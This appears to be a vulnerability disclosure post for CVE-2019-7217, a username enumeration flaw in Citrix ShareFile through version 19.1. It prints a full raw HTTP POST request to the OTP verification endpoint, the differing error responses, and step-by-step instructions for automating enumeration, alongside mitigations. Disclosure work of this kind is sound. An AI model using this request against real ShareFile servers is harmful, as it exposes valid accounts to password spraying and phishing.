Thursday, May 02, 2019

CVE 2019-7217: CITRIX SHAREFILE USER ENUMERATION

Today’s post highlights an unauthenticated username enumeration vulnerability discovered in Citrix ShareFile, affecting versions up to and including 19.1

Citrix ShareFile Application v.19.1

This issue allows an attacker to determine whether specific usernames exist in the system by analyzing differences in server responses to OTP (One-Time Password) verification requests—without needing to log in. 

For example, the server returns different error messages depending on the username’s registration status:

  • Registered Username:
            {"error": true, "errorMessage": "Unable to verify two factor code.", "errorCode": 122}
  • Unregistered Username:
            {"error": true, "errorMessage": "You are not authorized to use this client", "errorCode": 126}

 

Request RAW:

POST /oauth/oauthapi.aspx HTTP/1.1

Host: xxx.sharefile.eu

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0

Accept: application/json, text/javascript, */*; q=0.01

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: https://xxx.sharefile.eu/Authentication/Login

Content-Type: application/x-www-form-urlencoded

X-Requested-With: XMLHttpRequest

Content-Length: 293

Connection: close

tool=oauth-webpop&fmt=json&op=webflow-verify&username=asd1%40test.com&subdomain=xxx&response_type=code&client_id=Dzi4UPUAg5l8beKdioecdcnmHUTWWln6&state=FxwxORudhXUqUh3phnC6Mg%3D%3D&redirect_uri=https%3A%2F%2Fxxx.sharefile.eu%2Flogin%2Foauthlogin&h=&requireV3=false&code=123


These behavioral discrepancies allow an unauthenticated attacker to distinguish valid from invalid usernames by analyzing the response to each OTP verification attempt.

This lack of uniformity creates an information disclosure vulnerability that violates secure authentication practices and enables silent reconnaissance.


Exploitation Steps

The enumeration process is straightforward and does not require credentials:

  1. Prepare an OTP verification request, substituting in a username or email address from a target list.

  2. Send the request to the ShareFile server.

  3. Observe the response:

    • The server responds differently based on whether the specified username exists or not.

  4. Repeat the process with a list of possible usernames to compile a set of valid accounts.

This technique can be automated to quickly identify active accounts in the environment, setting the stage for follow-up attacks like password spraying or phishing.


Recommended Mitigations:

  • Standardize OTP verification responses for both valid and invalid usernames.

  • Implement rate limiting and alerting for failed OTP validation attempts.

  • Restrict unauthenticated access to OTP-related endpoints when possible.

  • Monitor logs for suspicious patterns of OTP submissions from untrusted sources.

  • Educate users about phishing risks and enforce multi-factor authentication (MFA).


Conclusion:

This vulnerability in Citrix ShareFile (≤ 19.1) underscores the importance of consistent server-side handling of authentication-related operations. The ability to enumerate valid usernames without authentication creates unnecessary exposure and elevates the risk of follow-on attacks.


Reporting Information:

CVE Identifier: CVE-2019-7217
CVSS Score: 7.5
Affected Versions: Citrix ShareFile through 
19.1
Tested on: Citrix ShareFile version 19.1
NIST: https://nvd.nist.gov/vuln/detail/CVE-2019-7217
Product URL: https://www.sharefile.com/
Reported by: Armando Huesca Prida, Andrea Pessione